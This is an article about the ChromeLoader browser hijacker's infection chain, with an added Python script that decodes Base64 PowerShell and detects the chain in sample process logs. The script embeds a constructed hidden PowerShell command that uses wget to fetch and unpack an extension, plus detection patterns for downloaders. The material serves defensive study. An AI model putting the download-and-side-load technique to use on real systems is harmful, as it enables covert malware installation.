A Google Chrome-based browser hijacker first discovered earlier this year has seen a surge of activity in recent days, according to a recently released report. The hijacker's ultimate purpose is mundane, redirecting user traffic to advertising websites, but the installation chain it uses is worth a closer look.
The hijacker, dubbed ChromeLoader, is initially delivered as an ISO file, typically masquerading as a cracked video game or pirated movie. The ISO contains an executable that, when run, injects itself into an svchost.exe process and creates a scheduled task through the Task Scheduler API rather than via a schtasks.exe command line, so there is no schtasks.exe process for process-creation logging to catch; the task registration shows up instead in the Task Scheduler operational log or, with object-access auditing enabled, as Security event 4698. The task then runs a cmd.exe process that executes a Base64-encoded PowerShell command. That PowerShell script checks whether the malicious browser extension is already installed and, if not, runs a wget.exe process to download and unpack the extension from a remote server. After unpacking, the scheduled task is silently deleted and a new Google Chrome process is launched with the "--load-extension" flag to side-load the downloaded extension. From that point the extension does its real job: redirecting search results through malvertising domains.
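As an added example (not part of the original report, and not code from the ChromeLoader sample), the following Python script decodes the Base64 PowerShell stage and flags the observable steps of the chain above in Sysmon-style process-creation records. It assumes the encoded command follows powershell.exe's standard -EncodedCommand convention (the script's UTF-16LE bytes, then Base64), which the report does not state explicitly; the sample events, the hypothetical stage-2 script, and its paths and URL are all constructed for the example.

```python
import base64
import re
from typing import Dict, List, Optional, Tuple

# --- Encoded-command handling -------------------------------------------------
# powershell.exe -EncodedCommand takes Base64 of the script's UTF-16LE bytes
# (not UTF-8); decoding with the wrong charset yields nul-padded garbage.

def encode_powershell(script: str) -> str:
    """Encode a script the way -EncodedCommand expects: UTF-16LE, then Base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_powershell(blob: str) -> Optional[str]:
    """Inverse of encode_powershell; None if the blob is not Base64 of UTF-16LE text."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


# --- Constructed sample telemetry (Sysmon Event ID 1 style), not real logs ---
# Hypothetical stage-2 script modelled on the behaviour described above; the
# paths and URL are assumptions, not recovered from a ChromeLoader sample.
STAGE2 = (
    'if (-not (Test-Path "$env:APPDATA\\ext\\manifest.json")) { '
    'wget.exe http://example.invalid/ext.zip -O "$env:TEMP\\ext.zip"; '
    'Expand-Archive "$env:TEMP\\ext.zip" "$env:APPDATA\\ext" }'
)
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CHROME = r"C:\Program Files\Google\Chrome\Application\chrome.exe"

SAMPLE_EVENTS: List[Dict[str, str]] = [
    # Scheduled task (hosted in svchost.exe) spawns cmd.exe carrying the encoded script.
    {"parent": r"C:\Windows\System32\svchost.exe", "image": r"C:\Windows\System32\cmd.exe",
     "cmd": "cmd.exe /c powershell.exe -WindowStyle Hidden -EncodedCommand " + encode_powershell(STAGE2)},
    {"parent": r"C:\Windows\System32\cmd.exe", "image": PS,
     "cmd": "powershell.exe -WindowStyle Hidden -EncodedCommand " + encode_powershell(STAGE2)},
    # Chrome started by the script with the unpacked extension side-loaded.
    {"parent": PS, "image": CHROME,
     "cmd": r'chrome.exe --load-extension="C:\Users\u\AppData\Roaming\ext"'},
    # Benign controls: user-launched Chrome and an admin's plain-text PowerShell.
    {"parent": r"C:\Windows\explorer.exe", "image": CHROME, "cmd": "chrome.exe https://example.com"},
    {"parent": r"C:\Windows\explorer.exe", "image": PS, "cmd": "powershell.exe -NoProfile -Command Get-Process"},
]

# --- Detection rules ---------------------------------------------------------
# PowerShell accepts any unambiguous prefix of -EncodedCommand; these are the common spellings.
ENC_FLAG = re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
# In Windows PowerShell 'wget' is also an alias of Invoke-WebRequest, so match both names.
DOWNLOADER = re.compile(r"wget|Invoke-WebRequest|Expand-Archive|load-extension", re.I)

Hit = Tuple[str, str, str]  # (rule, image, detail)


def analyze(events: List[Dict[str, str]]) -> List[Hit]:
    """Return one hit per rule that fires on each process-creation record."""
    hits: List[Hit] = []
    for ev in events:
        image, parent, cmd = ev["image"].lower(), ev["parent"].lower(), ev["cmd"]
        m = ENC_FLAG.search(cmd)
        if m:
            script = decode_powershell(m.group(1))
            if script is None:
                hits.append(("encoded_powershell_undecodable", ev["image"], cmd[:80]))
            elif DOWNLOADER.search(script):
                hits.append(("encoded_powershell_downloader", ev["image"], script))
        if image.endswith("chrome.exe") and "--load-extension" in cmd.lower():
            rule = ("chrome_load_extension_from_script"
                    if parent.endswith(("powershell.exe", "cmd.exe")) else "chrome_load_extension")
            hits.append((rule, ev["image"], cmd))
    return hits


if __name__ == "__main__":
    for rule, image, detail in analyze(SAMPLE_EVENTS):
        print(f"[{rule}] {image}\n    {detail}")
```

Two points are worth noting. First, the downloader rule inspects the decoded script rather than the raw command line, because the Base64 blob hides every keyword a string match would look for; the same blob appears on both the cmd.exe and the powershell.exe record, so both fire. Second, the rules cover only the stages that spawn a process: the task registration itself goes through the Task Scheduler API and never shows up as a schtasks.exe command line, so it has to be hunted in the Task Scheduler log or Security event 4698 instead.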
A macOS variant of ChromeLoader was also discovered. It uses similar techniques to deploy the malicious extension, substituting bash for PowerShell, which makes ChromeLoader a cross-platform threat. The macOS variant can load malicious extensions into both Chrome and Safari.